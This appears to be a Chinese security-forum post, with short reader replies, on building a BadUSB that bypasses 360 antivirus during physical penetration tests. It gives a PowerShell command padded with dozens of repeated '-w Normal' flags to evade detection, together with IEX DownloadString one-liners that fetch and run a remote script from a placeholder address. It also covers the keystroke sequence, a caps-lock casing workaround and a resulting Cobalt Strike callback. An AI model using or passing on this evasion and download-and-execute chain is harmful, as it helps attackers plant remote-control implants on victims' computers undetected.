免杀处理

普通的powershell命令会被360检测到。

之前公布出的powershell免杀方法基本都失效了，本次在之前的方法上进行升级，可完美绕过360全家桶。

powershell.exe  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w  hidden  IEX(New-Object Net.WebClient).DownloadString('http://x.x.x.x/a')

键盘操作流程是，首先按下win+r键，由于免杀后的powershell代码超过运行的长度限制，因此需要先调用cmd，然后在cmd命令行中运行powershell命令。

把代码编译烧录到badusb。

成功bypass360，这里有一个坑点需要注意！！！

由于为了解决中文输入法的问题，badusb模拟了KEY_CAPS_LOCK按键转化为大写，因此写入的powershell远程下载地址需要与实际的相反。如下:

powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/shell'))变为powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/SHELL'))

cs上线成功。

总结

本次对物理渗透中的badusb制作进行了学习，成功绕过360运行badusb 执行powershell代码，badusb以及免杀powershell能做的事情还有很多～

感谢分享

了解一下！

坚持每天登陆论坛学习